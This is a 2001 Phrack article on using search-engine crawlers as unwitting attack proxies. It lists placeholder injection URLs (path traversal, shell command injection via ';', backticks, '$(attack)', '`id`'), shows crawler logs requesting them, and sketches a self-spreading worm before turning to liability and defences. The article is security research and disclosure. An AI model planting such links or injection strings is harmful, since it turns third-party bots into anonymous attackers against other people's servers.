phrack/phrack57/10.txt

                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x0a of 0x12

|=-------------=[ Against the System: Rise of the Robots ]=--------------=|
|=-----------------------------------------------------------------------=|
|=-=[ (C)Copyright 2001 by Michal Zalewski <lcamtuf@bos.bindview.com> ]=-=|


-- [1] Introduction -------------------------------------------------------

  "[...] big difference between the web and traditional well controlled
   collections is that there is virtually no control over what people can
   put on the web. Couple this flexibility to publish anything with the
   enormous influence of search engines to route traffic and companies
   which deliberately manipulating search engines for profit become a
   serious problem."

                      -- Sergey Brin, Lawrence Page (see references, [A])

  Consider a remote exploit that is able to compromise a remote system
  without sending any attack code to his victim. Consider an exploit
  which simply creates local file to compromise thousands of computers,
  and which does not involve any local resources in the attack. Welcome to
  the world of zero-effort exploit techniques. Welcome to the world of
  automation, welcome to the world of anonymous, dramatically difficult
  to stop attacks resulting from increasing Internet complexity.

  Zero-effort exploits create their 'wishlist', and leave it somewhere
  in cyberspace - can be even its home host, in the place where others
  can find it. Others - Internet workers (see references, [D]) - hundreds
  of never sleeping, endlessly browsing information crawlers, intelligent
  agents, search engines... They come to pick this information, and -
  unknowingly - to attack victims. You can stop one of them, but can't
  stop them all. You can find out what their orders are, but you can't
  guess what these orders will be tomorrow, hidden somewhere in the abyss
  of not yet explored cyberspace.

  Your private army, close at hand, picking orders you left for them
  on their way. You exploit them without having to compromise them. They
  do what they are designed for, and they do their best to accomplish it.
  Welcome to the new reality, where our A.I. machines can rise against us.

  Consider a worm. Consider a worm which does nothing. It is carried and
  injected by others - but not by infecting them. This worm creates a
  wishlist - wishlist of, for example, 10,000 random addresses. And waits.
  Intelligent agents pick this list, with their united forces they try to
  attack all of them. Imagine they are not lucky, with 0.1% success ratio.
  Ten new hosts infected. On every of them, the worm does extactly the
  same - and agents come back, to infect 100 hosts. The story goes - or
  crawls, if you prefer.

  Agents work virtually invisibly, people get used to their presence
  everywhere. And crawlers just slowly go ahead, in never-ending loop.
  They work systematically, they do not choke with excessive data - they
  crawl, there's no "boom" effect. Week after week after week, they try
  new hosts, carefully, not overloading network uplinks, not generating
  suspected traffic, recurrent exploration never ends. Can you notice
  they carry a worm? Possibly...

-- [2] An example ---------------------------------------------------------

  When this idea came to my mind, I tried to use the simpliest test, just
  to see if I am right. I targeted, if that's the right word, general-purpose
  web indexing crawlers. I created very short HTML document and put it
  somewhere. And waited few weeks. And then they come. Altavista, Lycos
  and dozens of others. They found new links and picked them
  enthusiastically, then disappeared for days.

  bigip1-snat.sv.av.com:
    GET /indexme.html HTTP/1.0

  sjc-fe5-1.sjc.lycos.com:
    GET /indexme.html HTTP/1.0

  [...]

  They came back later, to see what I gave them to parse.

    http://somehost/cgi-bin/script.pl?p1=../../../../attack
    http://somehost/cgi-bin/script.pl?p1=;attack
    http://somehost/cgi-bin/script.pl?p1=|attack
    http://somehost/cgi-bin/script.pl?p1=`attack`
    http://somehost/cgi-bin/script.pl?p1=$(attack)
    http://somehost:54321/attack?`id`
    http://somehost/AAAAAAAAAAAAAAAAAAAAA...


  Our bots followed them exploiting hypotetical vulnerabilities,
  compromising remote servers:

  sjc-fe6-1.sjc.lycos.com:
    GET /cgi-bin/script.pl?p1=;attack HTTP/1.0

  212.135.14.10:
    GET /cgi-bin/script.pl?p1=$(attack) HTTP/1.0

  bigip1-snat.sv.av.com:
    GET /cgi-bin/script.pl?p1=../../../../attack HTTP/1.0

  [...]

  (BigIP is one of famous "I observe you" load balancers from F5Labs)
  Bots happily connected to non-http ports I prepared for them:

  GET /attack?`id` HTTP/1.0
  Host: somehost
  Pragma: no-cache
  Accept: text/*
  User-Agent: Scooter/1.0
  From: scooter@pa.dec.com

  GET /attack?`id` HTTP/1.0
  User-agent: Lycos_Spider_(T-Rex)
  From: spider@lycos.com
  Accept: */*
  Connection: close
  Host: somehost:54321

  GET /attack?`id` HTTP/1.0
  Host: somehost:54321
  From: crawler@fast.no
  Accept: */*
  User-Agent: FAST-WebCrawler/2.2.6 (crawler@fast.no; [...])
  Connection: close

  [...]

  But not only publicly available crawlbot engines can be targeted.
  Crawlbots from alexa.com, ecn.purdue.edu, visual.com, poly.edu,
  inria.fr, powerinter.net, xyleme.com, and even more unidentified
  crawl engines found this page and enjoyed it. Some robots didn't
  pick all URLs. For example, some crawlers do not index scripts
  at all, others won't use non-standard ports. But majority of
  the most powerful bots will do - and even if not, trivial filtering
  is not the answer. Many IIS vulnerabilities and so on can be triggered
  without invoking any scripts.

  What if this server list was randomly generated, 10,000 IPs or 10,000
  .com domains? What is script.pl is replaced with invocations of
  three, four, five or ten most popular IIS vulnerabilities or
  buggy Unix scripts? What if one out of 2,000 is actually exploited?

  What if somehost:54321 points to vulnerable service which can
  be exploited with partially user-dependent contents of HTTP
  requests (I consider majority of fool-proof services that do not
  drop connections after first invalid command vulnerable)? What if...

  There is an army of robots, different species, different functions,
  different levels of intelligence. And these robots will do whatever
  you tell them to do. It is scary.

-- [3] Social considerations ----------------------------------------------

  Who is guilty if webcrawler compromises your system? The most obvious
  answer is: the author of original webpage crawler visited. But webpage
  authors are hard to trace, and web crawler indexing cycle takes
  weeks. It is hard to determine when specific page was put on the net
  - they can be delivered in so many ways, processed by other robots
  earlier; there is no tracking mechanism we can find in SMTP protocol and
  many others. Moreover, many crawlers don't remember where they "learned"
  new  URLs. Additional problems are caused by indexing flags, like "noindex"
  without "nofollow" option. In many cases, author's identity and attack
  origin wouldn't be determined, while compromises would take place.

  And, finally, what if having particular link followed by bots wasn't
  what the author meant? Consider "educational" papers, etc - bots won't
  read the disclaimer and big fat warning "DO NOT TRY THESE LINKS"...

  By analogy to other cases, e.g. Napster forced to filter their contents
  (or shutdown their services) because of copyrighted information exchanged
  by their users, causing losses, it is reasonable to expect that
  intelligent bot developers would be forced to implement specific filters,
  or to pay enormous compensations to victims suffering because of bot
  abuse.

  On the other hand, it seems almost impossible to successfully filter
  contents to elliminate malicious code, if you consider the number and
  wide variety of known vulnerabilities. Not to mention targeted attacks
  (see references, [B], for more information on proprietary solutions and
  their insecuritities). So the problem persists. Additional issue is that
  not all crawler bots are under U.S. jurisdiction, which makes whole
  problem more complicated (in many countries, U.S. approach is found at
  least controversial).

-- [4] Defense ------------------------------------------------------------

  As discussed above, webcrawler itself has very limited defense and
  avoidance possibilities, due to wide variety of web-based
  vulnerabilities. One of more reasonable defense ideas is to use
  secure and up-to-date software, but - obviously - this concept is
  extremely unpopular for some reasons - www.google.com, with
  unique documents filter enabled, returns 62,100 matches for "cgi
  vulnerability" query (see also references, [D]).

  Another line of defense from bots is using /robots.txt standard
  robot exclusion mechanism (see references, [C], for specifications).
  The price you have to pay is partial or complete exclusion of your
  site from search engines, which, in most cases, is undesired. Also,
  some robots are broken, and do not respect /robots.txt when following
  a direct link to new website.

-- [5] References ---------------------------------------------------------

  [A] "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
      Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
      URL: http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm

  [B] Proprietary web solutions security, Michal Zalewski
      URL: http://lcamtuf.coredump.cx/milpap.txt

  [C] "A Standard for Robot Exclusion", Martijn Koster
      URL: http://info.webcrawler.com/mak/projects/robots/norobots.html

  [D] "The Web Robots Database"
      URL: http://www.robotstxt.org/wc/active.html
      URL: http://www.robotstxt.org/wc/active/html/type.html

  [E] "Web Security FAQ", Lincoln D. Stein
      URL: http://www.w3.org/Security/Faq/www-security-faq.html

|=[ EOF ]=---------------------------------------------------------------=|